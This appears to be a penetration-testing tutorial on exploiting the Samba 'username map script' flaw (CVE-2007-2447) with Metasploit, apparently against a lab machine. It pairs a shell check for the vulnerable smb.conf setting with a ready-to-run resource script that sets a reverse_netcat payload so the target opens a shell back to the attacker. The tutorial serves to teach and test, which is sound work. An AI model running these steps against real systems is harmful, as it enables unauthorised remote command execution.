Ethical Hacking - GAINING ACCESS(3)

Server side attacks: code execution

Let's analyze the Zenmap scan result first and search for known vulnerabilities in Samba smbd 3.x.

We find the following Metasploit module and try it: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script. Note that the module only covers Samba 3.0.20 through 3.0.25rc3 and only works when the non-default "username map script" option is configured, so a 3.x banner alone does not guarantee success; the exploit attempt itself is the test.

Samba "username map script" Command Execution
Disclosed: 05/14/2007
Created: 05/30/2018

Description
This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!

Author(s)
jduck <jduck@metasploit.com>

Platform
Unix

Architectures
cmd

References
CVE-2007-2447
OSVDB-34700
BID-23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html

Module Options
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show targets
...targets...
msf exploit(usermap_script) > set TARGET < target-id >
msf exploit(usermap_script) > show options
...show and set options...
msf exploit(usermap_script) > exploit
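The description above hinges on a non-default smb.conf setting. The following shell snippet is an added example, not code from the post or from Rapid7: it checks whether an smb.conf enables "username map script" in the [global] section, ignoring commented-out lines and copies of the option placed in a share section (Samba treats it as a global-only parameter, so those do not enable the vulnerable code path). The two sample configurations it writes are constructed for the demo, and the script path /etc/samba/scripts/mapusers.sh inside them is an assumption.

```sh
#!/usr/bin/env sh
# Added example (not from the post or Rapid7): detect the smb.conf precondition of
# CVE-2007-2447, i.e. "username map script" set in [global].
# Usage: smb_usermap_script_set /etc/samba/smb.conf
#   exit 0 and print the configured script when the option is set, exit 1 otherwise.

smb_usermap_script_set() {
  # Samba keys are case-insensitive and ignore internal whitespace; whole-line
  # comments start with '#' or ';'. Only the [global] section counts.
  awk '
    /^[ \t]*[#;]/ { next }                                     # comment line
    /^[ \t]*\[/   { sect = tolower($0); gsub(/[^a-z0-9_]/, "", sect); next }
    /=/ {
      key = $0; sub(/=.*/, "", key); gsub(/[ \t]/, "", key); key = tolower(key)
      val = $0; sub(/^[^=]*=[ \t]*/, "", val); sub(/[ \t]+$/, "", val)
      if (sect == "global" && key == "usernamemapscript" && val != "") {
        found = 1; print val; exit
      }
    }
    END { if (found) exit 0; exit 1 }
  ' "$1"
}

# Constructed sample configs for the demo (not copied from any real host).
# $1 gets the vulnerable layout, $2 a layout that merely looks similar.
write_samples() {
  cat > "$1" <<'EOF'
[global]
   workgroup = WORKGROUP
   security = user
   Username Map Script = /etc/samba/scripts/mapusers.sh
[homes]
   browseable = no
EOF
  cat > "$2" <<'EOF'
[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/scripts/mapusers.sh
[share]
   username map script = /bin/true
EOF
}

# Demo: run the check over both constructed files.
tmp=$(mktemp -d)
write_samples "$tmp/vulnerable.conf" "$tmp/safe.conf"
for f in "$tmp/vulnerable.conf" "$tmp/safe.conf"; do
  if val=$(smb_usermap_script_set "$f"); then
    echo "$f: username map script = $val (CVE-2007-2447 precondition present)"
  else
    echo "$f: option not set in [global]"
  fi
done
rm -rf "$tmp"
```

On a real host the function is run against /etc/samba/smb.conf; a non-empty result on a 3.0.20 to 3.0.25rc3 server is the combination the module needs, and removing the option (or upgrading) closes it.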

Open Metasploit, load the module, and set RHOST to the target's IP address.

Show payloads to list the command payloads the module can deliver.

Set the payload; a reverse payload makes the target connect back to our machine.

Set LHOST to our own IP address, the one the target will connect back to.

Set LPORT to the port our handler listens on.

Exploit the target machine successfully: the module returns a command shell on the target.
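The same steps as a Metasploit resource script, so the session can be replayed with msfconsole -r instead of retyping each option. This is an added example, not code from the post or from Metasploit. The addresses 10.0.2.4 (target) and 10.0.2.15 (attacker), port 4444 and the cmd/unix/reverse_netcat payload are assumed lab values, and RUN_MSF is this script's own switch. Current Metasploit names the target option RHOSTS and accepts the post's RHOST as an alias.

```sh
#!/usr/bin/env sh
# Added example (not from the post): the exploitation steps as a Metasploit resource
# script. Assumed lab values: RHOSTS 10.0.2.4, LHOST 10.0.2.15, LPORT 4444, payload
# cmd/unix/reverse_netcat (one of the cmd/unix/* payloads "show payloads" lists).

# Reject anything that is not a dotted-quad IPv4 address before it reaches the console,
# so a typo fails here instead of producing a silent bad listener or target.
is_ipv4() {
  echo "$1" | awk -F. 'NF == 4 { for (i = 1; i <= 4; i++) if ($i !~ /^[0-9]+$/ || $i > 255) exit 1; exit 0 } { exit 1 }'
}

# Print the msfconsole commands for the module. Args: RHOSTS LHOST [LPORT] [PAYLOAD]
usermap_rc() {
  rhost=$1; lhost=$2; lport=${3:-4444}; payload=${4:-cmd/unix/reverse_netcat}
  is_ipv4 "$rhost" || { echo "bad RHOSTS: $rhost" >&2; return 1; }
  is_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
  cat <<EOF
use exploit/multi/samba/usermap_script
set RHOSTS $rhost
set RPORT 139
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
show options
exploit
EOF
}

# Write the resource file; run it only when RUN_MSF=1 (this script's own switch) and
# msfconsole is installed, otherwise just show what would be executed.
rc=$(mktemp)
usermap_rc 10.0.2.4 10.0.2.15 4444 > "$rc"
if [ "${RUN_MSF:-0}" = 1 ] && command -v msfconsole >/dev/null 2>&1; then
  msfconsole -q -r "$rc"
else
  echo "resource script written to $rc:"; cat "$rc"
fi
```

RPORT 139 is the module's default SMB port; change it if the scan showed Samba only on 445. LHOST must be an address the target can actually reach, which is why it is validated like RHOSTS.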
